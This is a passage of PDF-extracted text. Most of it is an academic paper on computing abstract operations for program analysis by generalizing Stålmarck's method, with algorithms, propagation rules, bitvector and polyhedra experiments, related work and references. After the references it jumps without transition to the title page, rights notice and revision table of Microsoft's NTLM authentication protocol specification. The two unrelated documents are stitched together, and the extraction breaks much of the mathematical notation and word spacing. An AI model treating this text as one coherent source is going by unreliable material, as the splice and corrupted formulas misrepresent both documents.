7(P2,A2)←(P0,A0)⊓(B,⊤)
8(P′
1,A′
1)←(k–1)-assume[I]((P1,A1))
9(P′
2,A′
2)←(k–1)-assume[I]((P2,A2))
10(P,A)←(P′
1,A′
1)⊔(P′
2,A′
2)
11until((P,A) = (P′,A′))∥timeout
12return(P,A)
φ:=l l∈literal(L)
uφ⇔l∈ILeafφ:=φ1opφ2
uφ⇔(uφ1opuφ2)∈IInternal
Fig.2.Rules used to convert a formula φ∈Linto a set of integrity constraints I. op
represents any binary connective in L, and literal(L) is the set of atomic formulas and
their negations.
3 Algorithm for A  ̃ssume[φ](A)
This section presentsouralgorithmforcomputing A  ̃ssume[φ](A)∈A, forφ∈L.
The assumptions of our framework are as follows:
1. There is a Galois connection C−−−→←−−−
αγAbetweenAand concrete domain C.
2. There is an algorithm to perform the join of arbitrary elements of A.
3. Given a literal l∈L, there is an algorithm μ ̃αto compute a safe (overap-
proximating) “micro-  ̃α”—i.e.,A′=μ ̃α(l) such that γ(A′)⊇[[l]].
4. There is an algorithm to perform the meet of an arbitrary element ofAwith
an arbitrary element of {μ ̃α(l)|l∈literal(L)}.
Note thatAis allowed to have infinite descending chains; because A  ̃ssume works
from above, it is allowed to stop at any time, and the value in hand is an o ver-
approximation of the most precise answer.
Alg. 1 presents the algorithm that computes A  ̃ssume[φ](A) forφ∈Land
A∈A. Line (1) calls the function integrity, which converts φinto integrity
constraintsIby assigning a fresh Boolean variable to each subformula of φ,
using the rules described in Fig. 2. The variable uφcorresponds to formula φ.
We useUto denote the set of Boolean variables created when converting φtoI.
Alg. 1 also uses a second abstract domain P, each of whose elements represents
a set of Boolean assignments in P(U→{0,1}). For simplicity, in this paper P
is the Cartesian domain ( U →{0,1,∗})⊥, but other more-expressive Boolean
domains could be used [35].
A Method for Symbolic Computation of Abstract Operations 9
On line (2) of Alg. 1, an element of Pis created in which uφis assigned the
value 1, which asserts that φis true. Alg. 1 is parameterized by the value of k
(wherek≥0). LetγI((P,A)) denoteγ((P,A))∩[[I]]. The call to k-assume on
line (3) returns (  ̃P, ̃A), which is a semantic reduction of ( P,A) with respect toI;
that is,γI(( ̃P, ̃A)) =γI((P,A)) and ( ̃P, ̃A)⊑(P,A). In general, the greater the
value ofk, the more precise is the result computed by Alg. 1. The next theore m
states that Alg. 1 computes an over-approximation of Assume[ φ](A).
Theorem 1 ([36]). For allφ∈L,A∈A, if ̃A=A ̃ssume[φ](A), thenγ( ̃A)⊇
[[φ]]∩γ(A), and ̃A⊑A. ⊓ ⊔
Alg. 3 presents the algorithm to compute k-assume, for k≥1. Given the in-
tegrity constraints I, and the current abstract value ( P,A), k-assume[I]((P,A))
returns an abstract value that is a semantic reduction of ( P,A) with respect to
I. The crux of the computation is the inner loop body, lines (4)–(10), which
implements an analog of the Dilemma Rule from St ̊ almarck’s method [33].
The steps of the Dilemma Rule are shown schematically in Fig. 1(b). At
line (3) of Alg. 3, a Boolean variable uwhose value is unknown is chosen. B=
⊤P[u↦→0] and its complement B=⊤P[u↦→1] are used to split the current
abstract value ( P0,A0) into two abstract values ( P1,A1) = (P,A)⊓(B,⊤) and
(P2,A2) = (P,A)⊓(B,⊤), as shown in lines (6) and (7).
The calls to (k–1)-assume at lines (8) and (9) compute semantic red uctions
of (P1,A1) and (P2,A2) with respect to I, which creates ( P′
1,A′
1) and (P′
2,A′
2),
respectively. Finally, at line (10) ( P′
1,A′
1) and (P′
2,A′
2) are merged by performing
a join. (The result is labeled ( P3,A3) in Fig. 1(b).)
The steps of the Dilemma Rule (Fig. 1(b)) are repeated until a fixpoin t
is reached, or some resource bound is exceeded. The next theore m states that
k-assume[I]((P,A)) computes a semantic reduction of ( P,A) with respect to I.
Theorem 2 ([36]). For allP∈ PandA∈ A, if(P′,A′) =
k-assume[I]((P,A)), thenγI((P′,A′)) =γI((P,A))and(P′,A′)⊑(P,A).⊓ ⊔
Alg. 2 describes the algorithm to compute 0-assume: given the integ rity con-
straintsI, and an abstract value ( P,A), 0-assume[I]((P,A)) returns an abstract
value (P′,A′) that is a semantic reduction of ( P,A) with respect to I. It is
in this algorithm that information is passed between the component a bstract
valuesP∈PandA∈Aviapropagation rules , like the ones shown in Figs. 3
and 4. In lines (4)–(7) of Alg. 2, these rules are applied by using a sing le integrity
constraint inIand the current abstract value ( P,A).
GivenJ∈Iand (P,A), the net effect of applying any of the propagation
rules is to compute a semantic reduction of ( P,A) with respect to J∈I. The
propagation rules used in Alg. 2 can be classified into two categories:
1. Rules that apply on line (7) when Jis of the form p⇔(qopr), shown in
Fig. 3. Such an integrity constraint is generated from each interna l subfor-
mula of formula φ. These rules compute a non-trivial semantic reduction of
Pwith respect to Jby only using information from P. For instance, rule
10 Aditya Thakur and Thomas Reps
J= (u1⇔(u2∨u3))∈IP(u1) = 0
(P⊓⊤[u2↦→0,u3↦→0],A)Or1
J= (u1⇔(u2∧u3))∈IP(u1) = 1
(P⊓⊤[u2↦→1,u3↦→1],A)And1
Fig.3.Boolean rules used by Alg. 2 in the call InternalRule( J,(P,A)).
J= (u⇔l)∈IP(u) = 1
(P,A⊓μ ̃αA(l))PtoA-1J= (u⇔l)∈IP(u) = 0
(P,A⊓μ ̃αA(¬l))PtoA-0
J= (u⇔l)∈IA⊓μ ̃αA(l) =⊥A
(P⊓⊤[u↦→0],A)AtoP-0
Fig.4.Rules used by Alg. 2 in the call LeafRule( J,(P,A)).
And1says that if Jis of the form p⇔(q∧r), andpis 1 inP, then we can
infer that both qandrmust be 1. Thus, P⊓⊤[q↦→1,r↦→1] is a semantic
reduction of Pwith respect to J. (See Ex. 1, step 1.)
2. Rulesthatapplyonline(5)when Jisoftheform u⇔l,showninFig.4.Such
an integrity constraint is generated from each leaf of the original f ormulaφ.
This category of rules can be further subdivided into
(a) Rulesthatpropagateinformationfromabstractvalue Ptoabstractvalue
A; viz., rules PtoA-0 andPtoA-1. For instance, rule PtoA-1 states
that given J=u⇔l, andP(u) = 1, then A⊓μ ̃α(l) is a semantic
reduction of Awith respect to J. (See Ex. 1, steps 2 and 3.)
(b) Rule AtoP-0, which propagates information from abstract value Ato
abstractvalue P.RuleAtoP-0 statesthatif J= (u⇔l)andA⊓μ ̃α(l) =
⊥A, then we can infer that uis false. Thus, the value of P⊓⊤[u↦→0] is
a semantic reduction of Pwith respect to J. (See Ex. 1, step 4.)
Alg. 2 repeatedly applies the propagation rules until a fixpoint is reac hed, or
some resource bound is reached. The next theorem states that 0 -assume com-
putes a semantic reduction of ( P,A) with respect to I.
Theorem 3 ([36]). For allP∈P,A∈A, if(P′,A′) = 0-assume[I]((P,A)),
thenγI((P′,A′)) =γI((P,A))and(P′,A′)⊑(P,A). ⊓ ⊔
4 Instantiations
In this section, we describe instantiations of our framework for tw o logical-
language/abstract-domain pairs: QF BV/KS and QF LRA/Polyhedra. We say
that an A  ̃ssume algorithm is complete for a logicLand abstract domain Aif it
is guaranteed to compute the best value ˆAssume[φ](A) forφ∈LandA∈A.
We give conditions under which the two instantiations are complete.
A Method for Symbolic Computation of Abstract Operations 11
Bitvector Affine-Relation Domain (QF BV/KS). King and Søndergaard
[21] gave an algorithm for ˆαfor an abstract domain of Boolean affine relations.
Elder et al. [12] extended the algorithmto arithmetic modulo 2w(i.e., bitvectors
of widthw). Both algorithms work from below, making repeated calls on a SAT
solver (King and Søndergaard) or an SMT solver (Elder et al.), perfo rming joins
to create increasingly better approximations of the desired answe r. We call this
family of domains KS, and call the (generalized) algorithm ˆα↑
KS.
Given a literal l∈QFBV, we compute μ ̃αKS(l) by invoking ˆα↑
KS(l). That is,
we harness ˆα↑
KSin service of A  ̃ssume KS, but only for μ ̃αKS, which means that
ˆα↑
KSis only applied to literals. If an invocation of ˆα↑
KSdoes not return an answer
within a specified time limit, we use ⊤KS.
Alg. 1 is not complete for QF BV/KS. Let xbe a bitvector of width 2, and
letφ= (x̸= 0∧x̸= 1∧x̸= 2). Thus, ˆAssume[φ](⊤KS) ={x−3 = 0}.
The KS domain is not expressive enough to represent disequalities. F or instance,
μ ̃α(x̸= 0) equals⊤KS. BecauseAlg. 1 considersonlya singleintegrityconstraint
at a time, we get A  ̃ssume[φ](⊤KS) =μ ̃α(x̸= 0)⊓μ ̃α(x̸= 1)⊓μ ̃α(x̸= 2) =⊤KS.
The current approach can be made complete for QF BV/KS by making
0-assumeconsidermultipleintegrityconstraintsduringpropagatio n(inthelimit,
having to call μ ̃α(φ)). For the affine subset of QF BV, an alternative approach
would be to perform a 2w-way split on the KS value each time a disequal-
ity is encountered, where wis the bit-width—in effect, rewriting x̸= 0 to
(x= 1∨x= 2∨x= 3). Furthermore, if there is a μA ̃ssume operation, then the
second approach can be extended to handle all of QF BV:μA ̃ssume[l](A) would
be used to take the current KS abstract value Aand a literal l, and return an
over-approximationofA  ̃ssume[l](A).Alltheseapproacheswouldbeprohibitively
expensive. Our current approach, though theoretically not comp lete, works very
well in practice (see §5).
Polyhedral Domain (QF LRA/Polyhedra). The second instantiation that
we implemented is for the logic QF LRA and the polyhedral domain [8]. Because
aQFLRAdisequality t̸= 0can be normalizedto ( t<0∨t>0),everyliteral lin
a normalized QF LRA formula is merely a half-space in the polyhedral domain.
Consequently, μ ̃αPolyhedra(l)isexact,andeasytocompute.Furthermore,because
of this precision, the A  ̃ssume algorithm is complete for QF LRA/Polyhedra. In
particular, if k=|φ|, then k-assume is sufficient to guaranteethat A  ̃ssume[φ](A)
returns ˆAssume[φ](A). For polyhedra, our implementation uses PPL [28].
The observation in the last paragraph applies in general: if μ ̃αA(l) is exact
for all literals l∈L, then Alg. 1 is complete for logic Land abstract domain A.
5 Experiments
Bitvector Affine-Relation Analysis (ARA). We compare two methods for
computing the abstract transformers for the KS domain for ARA [2 1]:
–theˆα↑-based procedure described in Elder et al. [12].
–the ̃α-based procedure described in this paper (“  ̃α↓”), instantiated for KS.
12 Aditya Thakur and Thomas Reps
Prog. Measures of size ˆα↑Performance
name instrsCFGsBBsbrsWPDSt/opost*query
finger 5321829848110.940.2660.015
subst 1093 1660974204.440.3440.016
label 1167 16573103148.920.3440.032
chkdsk 1468 18787119384.4160.2190.031
convert 1927 381013161289.991.0470.062
route 1982 40931243562.9141.2810.046
logoff 2470 461145306621.1161.9380.063
setup 4751 6718625891524.7640.9680.047
Fig.5.WPDSexperiments( ˆα↑).Thecolumnsshowthenumberofinstructions(instrs);
the number of procedures (CFGs); the number of basic blocks ( BBs); the number of
branch instructions (brs); the times, in seconds, for WPDS c onstruction with ˆα↑
KS
weights, running post*, and finding one-vocabulary affine relations at blocks that en d
with branch instructions (query). The number of basic block s for which ˆα↑
KS-weight
generation timed out is listed under “t/o”.
Our experiments were designed to answer the following questions:
1. How does the speed of  ̃α↓compare with that of ˆα↑?
2. How does the precision of  ̃α↓compare with that of ˆα↑?
To address these questions, we performed ARA on x86 machine cod e, computing
affine relations over the x86 registers. Our experiments were run o n a single core
of a quad-core 3.0 GHz Xeon computer running 64-bit Windows XP (SP 2),
configured so that a user process has 4GB of memory. We analyzed a corpus of
Windows utilities using the WALi [20] system for weighted pushdown sy stems
(WPDSs). For the baseline ˆα↑-based analysis we used a weight domain of ˆα↑-
generated KS transformers. The weight on each WPDS rule encode s the KS
transformer for a basic block Bof the program, including a jump or branch to a
successor block. A formula φBis created that captures the concrete semantics of
B, and then the KS weight for Bis obtained by performing ˆα↑(φB) (cf. Ex. 1).
We used EWPDS merge functions [24] to preserve caller-save and ca llee-save
registers across call sites. The post*query used the FWPDS algorithm [23].
Fig. 5 lists several size parameters of the examples (number of inst ructions,
procedures, basic blocks, and branches) along with the times for c onstructing
abstract transformers and running post*.4Col. 6 of Fig. 5 shows that the calls
toˆα↑during WPDS construction dominate the total time for ARA.
Eachcall to ˆα↑involvesrepeated invocationsof an SMT solver. Although the
overall time taken by ˆα↑is not limited by a timeout, we use a 3-second timeout
for each invocation of the SMT solver (as in Elder et al. [12]). Fig. 5 lists the
number of such SMT solver timeouts for each benchmark. In case t he invocation
of the SMT solver times out, ˆα↑is forced to return ⊤KSin order to be sound.
(Consequently, it is possible for  ̃α↓to return a more precise answer than ˆα↑.)
4Due to the high cost of the ˆα↑-based WPDS construction, all analyses excluded the
codeforlibraries. Because register eaxholdsthereturnvaluefromacall, libraryfunc-
tions were modeled approximately (albeit unsoundly, in gen eral) by “ havoc(eax)”.
A Method for Symbolic Computation of Abstract Operations 13
(a) (b)
Fig.6.(a) Performance:  ̃α↓vs.ˆα↑. (b) Precision: % of control points at which  ̃α↓has
as good or better precision as ˆα↑; the lighter-color lower portion of each bar indicates
the % of control points at which the precision is strictly gre ater for  ̃α↓.
(a) (b)
Fig.7.(a) Log-log scatter plot of transformer-construction time . (b) Semilog plot of
Z3 vs. ̃α↓onχdformulas.
The setup for the  ̃α↓-based analysis is the same as the baseline ˆα↑-based
analysis,except that we call  ̃α↓when calculatingthe KS weight for a basicblock.
We use 1-assume in this experiment. Each basic-block formula φBis rewritten
to a set of integrity constraints, with ITE-terms rewritten as illust rated in Ex. 1.
The priority of a Boolean variable is its postorder-traversal numbe r, and is used
to select which variable is used in the Dilemma Rule. We bound the total t ime
taken by each call to  ̃α↓to a fixed timeout T. Note that even when the call to
 ̃α↓times out, it can still return a sound non- ⊤KSvalue. We ran  ̃α↓usingT= 1
sec,T= 0.4 secs, and T= 0.1 secs.
Fig. 6(a) shows the normalized time taken for WPDS construction wh en
using ̃α↓withT= 1 sec, T= 0.4 secs, and T= 0.1 secs. The running time is
normalized to the corresponding time taken by ˆα↑; lower numbers are better.
14 Aditya Thakur and Thomas Reps
WPDS construction using  ̃α↓withT= 1 sec. is about 11.3 times faster than ˆα↑
(computed as the geometric mean), which answers question 1.
Decreasing the timeout Tmakes the  ̃α↓WPDS construction only slightly
faster: on average, going from T= 1 sec. to T=.4 secs. reduces WPDS construc-
tion time by only 17% (computed as the geometric mean). To underst and this
behavior better, we show in Fig. 7(a) a log-log scatter-plot of the t imes taken by
ˆα↑versus the times taken by  ̃α↓(withT= 1 sec.), to generate the transformers
for each basic block in the benchmark suite. As shown in Fig. 7(a), th e times
taken by  ̃α↓are bounded by 1 second. (There are a few calls that take more
than 1 second; they are an artifact of the granularity of operatio ns at which we
check whether the procedure has timed out.) Most of the basic bloc ks take less
than 0.4 seconds, which explains why the overall time for WPDS const ruction
does not decrease much as we decrease Tin Fig. 6(a). We also see that the ˆα↑
times are not bounded, and can be as high as 50 seconds.
To answer question 2 we compared the precision of the WPDS analysis when
using ̃α↓withTequal to 1, 0.4,and 0.1 secondswith the precision obtained using
ˆα↑. In particular, we compare the affine relations (i.e., invariants) comp uted by
the ̃α↓-based and ˆα↑-based analyses for each control point —i.e., the beginning of
a basic block that ends with a branch. Fig. 6(b) shows the percenta ge of control
points for which the  ̃α↓-based analysis computes a better (tighter) or equally
precise affine relation. On average, when using T= 1 sec,  ̃α↓-based analysis com-
putes an equally precise invariant at 76.9% of the control points (computed as
the arithmetic mean). Interestingly, the  ̃α↓-based analysis computes an answer
that ismore precise compared to that computed by the ˆα↑-based analysis. That
is not a bug in our implementation; it happens because ˆα↑has to return⊤KS
when the call to the SMT solver times out. In Fig. 6(b), the lighter-c olor lower
portion of each bar shows the percentage of control points for w hich ̃α↓-based
analysis provides strictly more precise invariants when compared to ˆα↑-based
analysis; on average,  ̃α↓-based analysis is more precise for 19.8% of the control
points (arithmetic mean, for T= 1 second).  ̃α↓-based analysis is less precise at
only 3.3% of the control points. Furthermore, as expected, when the timeout for
 ̃α↓is reduced, the precision decreases.
Satisfiability Checking. The formula used in Ex. 2 is just one instance of a
family of unsatisfiable QF LRA formulas [25]. Let χd= (ad<a0)∧⋀d−1
i=0((ai<
bi)∧(ai<ci)∧((bi<ai+1)∨(ci<ai+1))). The formula ψin Ex. 2 isχ2; that is,
the number of “diamonds” is 2 (see Fig. 1(a)). We used the QF LRA/Polyhedra
instantiation of our framework to check whether  ̃α(χd) =⊥ford= 1...25
using 1-assume. We ran this experiment on a single processor of a 16 -core 2.4
GHz Intel Zeon computer running 64-bit RHEL Server release 5.7. T he semilog
plot in Fig. 7(b) compares the running time of  ̃α↓with that of Z3, version
3.2 [11]. The time taken by Z3 increases exponentially with d, exceeding the
timeout threshold of 1000 seconds for d= 23. This corroborates the results of a
similar experiment conducted by McMillan et al. [25], where the reader c an also
find an in-depth explanation of this behavior.
A Method for Symbolic Computation of Abstract Operations 15
On the other hand, the running time of  ̃α↓increases linearly with dtaking
0.78 seconds for d= 25. The cross-over point is d= 12. In Ex. 2, we saw
how two successive applications of the Dilemma Rule suffice to prove th atψis
unsatisfiable. That explanation generalizes to χd:dapplications of the Dilemma
Rule are sufficient to prove unsatisfiability of χd. The order in which Boolean
variableswithunknowntruthvaluesareselectedforuseinthe Dilemm aRule has
no bearing on this linear behavior, as long as no variable is starved fro m being
chosen (i.e., a fair-choice schedule is used). Each application of the D ilemma
Rule is able to infer that ai<ai+1for somei.
We do not claim that  ̃α↓is better than mature SMT solvers such as Z3.
We do believe that it represents another interesting point in the des ign space of
SMT solvers,similarinnatureto theGDPLL algorithm[25]andthe k-lookahead
technique used in the DPLL( ⊔) algorithm [4].
6 Applications to Other Symbolic Operations
The symbolic operations of ˆγandˆαcan be used to implement a number of other
useful operations, as discussed below. In each case, over-appr oximations result
ifˆαis replaced by  ̃α.
–The operation of containment checking, A1⊑A2, which is needed by anal-
ysis algorithms to determine when a post-fixpoint is attained, can be imple-
mented by checking whether ˆα(ˆγ(A1)∧¬ˆγ(A2)) equals⊥.
–Suppose that there are two Galois connections G1=C−−−→←−−−
α1γ1A1and
G2=C−−−→←−−−
α2γ2A2, and one wants to work with the reduced product of
A1andA2[7,§10.1]. The semantic reduction of a pair ( A1,A2) can be per-
formed by letting ψbe the formula ˆγ1(A1)∧ˆγ2(A2), and creating the pair
(ˆα1(ψ),ˆα2(ψ)).
–GivenA1∈A1, one can find the most-precise value A2∈A2that over-
approximates A1inA2as follows:A2=ˆα2(ˆγ1(A1)).
–Given a loop-free code fragment F, consisting of one or more blocks of pro-
gram statements and conditions, one can obtain a representation of its best
transformer by symbolically executing Fto obtain a transition formula ψF,
and then performing ˆα(ψF).
7 Related Work
Extensions of St ̊ almarck’s Method. Bj ̈ ork [3] describes extensions of
St ̊ almarck’s method to first-order logic. Like Bj ̈ ork, our work go es beyond the
classical setting of St ̊ almarck’s method [33] (i.e., propositional logic ) and ex-
tends the method to more expressive logics, such as QF LRA or QF BV. How-
ever, Bj ̈ ork is concerned solely with validity checking, and—compar ed with the
propositional case—the role of abstraction is less clear in his method . Our algo-
rithm not only uses an abstract domain as an explicit datatype, the g oal of the
algorithm is to compute an abstract value A′= A ̃ssume[φ](A).
Our approach was influenced by Granger’s method of using (in)equa tion
solving as a way to implement semantic reduction and Assume as part o f his
16 Aditya Thakur and Thomas Reps
techniqueof local decreasing iterations [16].Grangerdescribestechniquesforper-
forming reductions with respect to (in)equations of the form x1⋊ ⋉F(x1,...,xn)
and (x1∗F(x1,...,xn))⋊ ⋉G(x1,...,xn), where ⋊ ⋉stands for a single relational
symbol ofL, such as =,̸=,<,≤,>,≥, or≡(arithmetical congruence). Our
frameworkis not limited to literalsof these forms; allthat we require is that fora
literall∈L, thereis an algorithmto compute anoverapproximatingvalue μ ̃α(l).
Moreover, Granger has no analog of the Dilemma Rule, nor does he pr esent any
completeness results (cf. §4).
SMT Solvers. Most methods for SMT solving can be classified according to
whether they employ lazyoreagertranslations to SAT. (The SAT procedure
then employed is generally based on the DPLL procedure [10,9].) In co ntrast,
the algorithm for SMT described in this paper is not based on a transla tion to
SAT; instead, it generalizes St ̊ almarck’s method for propositional logic to richer
logics.
Lazy approachesabstract each atom of the input formula to a dist inct propo-
sitional variable, use a SAT solver to find a propositional model, and t hen check
that model against the theory [1,13,11]. The disadvantage of the lazy approach
is that it cannot use theory information to prune the search. In co ntrast, our
algorithm is able to use theory-specific information to make deductio ns—in par-
ticular,inthe LeafRulefunction (Fig.4)usedinAlg.2.Theuseofthe ory-specific
informationisthereasonwhyourapproachoutperformedZ3,whic husesthelazy
approach, on the diamond example ( §5).
Eager approaches [5,34] encode more of the theory into the prop ositional
formula that is given to the SAT solver, and hence are able to constr ain the
solution space with theory-specific information. The challenge in des igning such
solvers is to ensure that the propositional formula does not blow up in size. In
our approach, such an explosion in the set of literals in the formula is a voided
because our learned facts are restricted by the abstract domain in use.
A variant of the Dilemma Rule is used in DPLL( ⊔), and allows the theory
solver in a lazy DPLL-based SMT solver to produce joins of facts ded uced along
different search paths. However, as pointed out by Bjørner et al. [4,§5], their
system is weaker than St ̊ almarck’s method, because St ̊ almarck’s method can
learn equivalences between literals.
Another difference between our work and existing approaches to S MT is
the connection presented in this paper between St ̊ almarck’s meth od and the
computation of best abstract operations for abstract interpre tation.
Best Abstract Operations. Several papers about best abstract operations
have appeared in the literature [14,29,37,21,12]. Graf and Sa ̈ ıdi [14] showed
that decision procedures can be used to generate best abstract transformers
for predicate-abstraction domains. Other work has investigated more efficient
methods to generate approximate transformers that are not be st transformers,
but approach the precision of best transformers [2,6].
Several techniques work from below[29,21,12]—performing joins to incorpo-
rate more and more of the concrete state space—which has the dr awback that if
they are stopped before the final answer is reached, the most-r ecent approxima-
A Method for Symbolic Computation of Abstract Operations 17
tion is an under-approximation of the desired value. In contrast, our technique
works from above. It can stop at any time and return a safe answer.
Yorsh et al. [37] developed a method that works from above to perf orm
A ̃ssume[φ](A) for the kind of abstract domains used in shape analysis (i.e.,
“canonical abstraction” of logical structures [30]). Their method has a splitting
step, but no analog of the join step performed at the end of an invo cation of the
Dilemma Rule. In addition, their propagation rules are much more heav yweight.
Template Constraint Matrices (TCMs) are a parametrized family of lin ear-
inequality domains for expressing invariants in linear real arithmetic. Sankara-
narayanan et al. [31] gave a parametrized meet, join, and set of ab stract trans-
formers for all TCM domains. Monniaux [26] gave an algorithm that fin ds the
best transformer in a TCM domain across a straight-line block (assu ming that
concrete operations consist of piecewise linear functions), and go od transform-
ers across more complicated control flow. However, the algorithm uses quan-
tifier elimination, and no polynomial-time elimination algorithm is known for
piecewise-linear systems.
Cover algorithms. Gulwani and Musuvathi [17] defined the “cover problem”,
which addresses approximate existential quantifier elimination : Given a formula
φin logicL, and a set of variables V, find the strongest quantifier-free formula φ
inLsuch that [[∃V:φ]]⊆[[φ]]. They presented cover algorithms for the theories
of uninterpreted functions and linear arithmetic, and showed that covers exist
in some theories that do not support quantifier elimination.
The notion of a cover has similarities to the notion of symbolic abstrac tion,
but the two notions are distinct. Our technical report [36] discuss es the differ-
ences in detail, describing symbolic abstraction as over-approximat inga formula
φusing an impoverished logic fragment, while a cover algorithm only remo ves
variablesVfrom the vocabulary of φ. The two approaches yield different over-
approximations of φ, and the over-approximationobtained by a cover algorithm
does not, in general, yield suitable abstract values and abstract tr ansformers.
References
1. A. Armando, C. Castellini, and E. Giunchiglia. SAT-based procedures for temporal
reasoning. In Recent Advances in AI Planning , 2000.
2. T. Ball, A. Podelski, and S. Rajamani. Boolean and Cartesi an abstraction for
model checking C programs. In TACAS, 2001.
3. M. Bj ̈ ork. First order St ̊ almarck. J. Autom. Reasoning , 42(1):99–122, 2009.
4. N. Bjørner and L. de Moura. Accelerated lemma learning usi ng joins–DPLL(⊔).
InLPAR, 2008.
5. R. E. Bryant and M. N. Velev. Boolean satisfiability with tr ansitivity constraints.
Trans. on Computational Logic , 3(4), 2002.
6. E. Clarke, D. Kroening, N. Sharygina, and K. Yorav. Predic ate abstraction of
ANSI-C programs using SAT. FMSD, 25(2–3), 2004.
7. P. Cousot and R. Cousot. Systematic design of program anal ysis frameworks. In
POPL, 1979.
8. P. Cousot and N. Halbwachs. Automatic discovery of linear constraints among
variables of a program. In POPL, 1978.
18 Aditya Thakur and Thomas Reps
9. M. Davis, G. Logemann, and D. Loveland. A machine program f or theorem-
proving. Commun. ACM , 5(7), 1962.
10. M. Davis and H. Putnam. A computing procedure for quantifi cation theory. J.
ACM, 7(3), 1960.
11. L. de Moura and N. Bjørner. Z3: An efficient SMT solver. In TACAS, 2008.
12. M. Elder, J. Lim, T. Sharma, T. Andersen, and T. Reps. Abst ract domains of
affine relations. In SAS, 2011.
13. C. Flanagan, R. Joshi, X. Ou, and J. Saxe. Theorem proving using lazy proof
explication. In CAV, 2003.
14. S. Graf and H. Sa ̈ ıdi. Construction of abstract state gra phs with PVS. In CAV,
1997.
15. S. Graham and M. Wegman. A fast and usually linear algorit hm for data flow
analysis. J. ACM, 23(1):172–202, 1976.
16. P. Granger. Improving the results of static analyses pro grams by local decreasing
iteration. In FSTTCS , 1992.
17. S. Gulwani and M. Musuvathi. Cover algorithms and their c ombination. In ESOP,
2008.
18. J. Harrison. St ̊ almarck’s algorithm as a HOL derived rul e. InTPHOLs , 1996.
19. M. Karr. Affine relationship among variables of a program. Acta Inf. , 6, 1976.
20. N. Kidd, A. Lal, and T. Reps. WALi: The Weighted Automaton Library, 2007.
www.cs.wisc.edu/wpis/wpds/download.php.
21. A. King and H. Søndergaard. Automatic abstraction for co ngruences. In VMCAI,
2010.
22. J. Knoop and B. Steffen. The interprocedural coincidence theorem. In CC, 1992.
23. A. Lal and T. Reps. Improving pushdown system model check ing. InCAV, 2006.
24. A. Lal, T. Reps, and G. Balakrishnan. Extended weighted p ushdown systems. In
CAV, 2005.
25. K. McMillan, A. Kuehlmann, and M. Sagiv. Generalizing DP LL to richer logics.
InCAV, 2009.
26. D. Monniaux. Automatic modular abstractions for templa te numerical constraints.
LMCS, 6(3), 2010.
27. M. M ̈ uller-Olm and H. Seidl. Analysis of modular arithme tic.TOPLAS , 2007.
28. PPL: The Parma polyhedra library. www.cs.unipr.it/ppl /.
29. T.Reps,M. Sagiv, andG. Yorsh. Symbolicimplementation ofthebesttransformer.
InVMCAI, 2004.
30. M. Sagiv, T. Reps, and R. Wilhelm. Parametric shape analy sis via 3-valued logic.
TOPLAS , 24(3):217–298, 2002.
31. S. Sankaranarayanan, H. Sipma, and Z. Manna. Scalable an alysis of linear systems
using mathematical programming. In VMCAI, 2005.
32. M. Sharir and A. Pnueli. Two approaches to interprocedur al data flow analysis.
InProgram Flow Analysis: Theory and Applications . Prentice-Hall, 1981.
33. M. Sheeran and G. St ̊ almarck. A tutorial on St ̊ almarck’s proof procedure for
propositional logic. FMSD, 16(1), 2000.
34. O. Strichman. On solving Presburger and linear arithmet ic with SAT. In FMCAD ,
2002.
35. A. Thakur and T. Reps. A generalization of St ̊ almarck’s m ethod. TR 1699, CS
Dept., Univ. of Wisconsin, Madison, WI, Oct. 2011.
36. A. Thakur and T. Reps. A method for symbolic computation o f precise abstract
operations. TR 1708, CS Dept., Univ. of Wisconsin, Madison, WI, Jan. 2012.
37. G. Yorsh, T. Reps, and M. Sagiv. Symbolically computing m ost-precise abstract
operations for shape analysis. In TACAS, 2004. 
1 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  [MS-NLMP]:  
NT LAN Manager (NTLM) Authentication Protocol 
Specification  
 
Intellectual Property Rights Notice for Open Specifications Documentation  
 Technical Documentation.  Microsoft publishes Open Specifications documentation for 
protocols, file formats, languages, standards as well as overviews of the interaction among each 
of these technologies.  
 Copyrights.  This documentation is covered by Microsoft copyrights. Regardles s of any other 
terms that are contained in the terms of use for the Microsoft website that hosts this 
documentation, you may make copies of it in order to develop implementations of the 
technologies described in the Open Specifications and may distribute p ortions of it in your 
implementations using these technologies or your documentation as necessary to properly 
document the implementation. You may also distribute in your implementation, with or without 
modification, any schema, IDL’s, or code samples that  are included in the documentation. This 
permission also applies to any documents that are referenced in the Open Specifications.  
 No Trade Secrets.  Microsoft does not claim any trade secret rights in this documentation.  
 Patents.  Microsoft has patents that  may cover your implementations of the technologies 
described in the Open Specifications. Neither this notice nor Microsoft's delivery of the 
documentation grants any licenses under those or any other Microsoft patents. However, a given 
Open Specification may be covered by Microsoft's Open Specification Promise (available here:  
http://www.microsoft.com/interop/osp ) or the Community Promise (available here: 
http://www.microsoft.com/interop/cp/default.mspx ). If you would prefer a written license, or if 
the technologies described in the Open Specifications are not covered by the Open Specifications 
Promise or Community Promise, as applicab le, patent licenses are available by contacting 
iplg@microsoft.com . 
 Trademarks.  The names of companies and products contained in this documentation may be 
covered by trademarks or similar intellectual property rights . This notice does not grant any 
licenses under those rights.  
 Fictitious Names.  The example companies, organizations, products, domain names, e -mail 
addresses, logos, people, places, and events depicted in this documentation are fictitious.  No 
association  with any real company, organization, product, domain name, email address, logo, 
person, place, or event is intended or should be inferred.  
Reservation of Rights.  All other rights are reserved, and this notice does not grant any rights 
other than specifica lly described above, whether by implication, estoppel, or otherwise.  
Tools.  The Open Specifications do not require the use of Microsoft programming tools or 
programming environments in order for you to develop an implementation. If you have access to 
Micro soft programming tools and environments you are free to take advantage of them. Certain 
Open Specifications are intended for use in conjunction with publicly available standard 
specifications and network programming art, and assumes that the reader either is familiar with the 
aforementioned material or has immediate access to it.  
 
2 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  Revision Summary  
Date  Revision 
History  Revision 
Class  Comments  
02/22/2007  0.01   MCPP Milestone 3 Initial Availability  
06/01/2007  1.0 Major  Updated and revised the technical content.  
07/03/2007  1.0.1 Editorial  Revised and edited the technical content.  
07/20/2007  2.0 Major  Updated and revised the technical content.  
08/10/2007  3.0 Major  Updated and revised the technical content.  
09/28/2007  4.0 Major  Updated and revised the technical content.  
10/23/2007  5.0 Major  Updated and revised the technical content.  
11/30/2007  6.0 Major  Updated and revised the technical content.  
01/25/2008  6.0.1 Editorial  Revised and edited the technical content.  
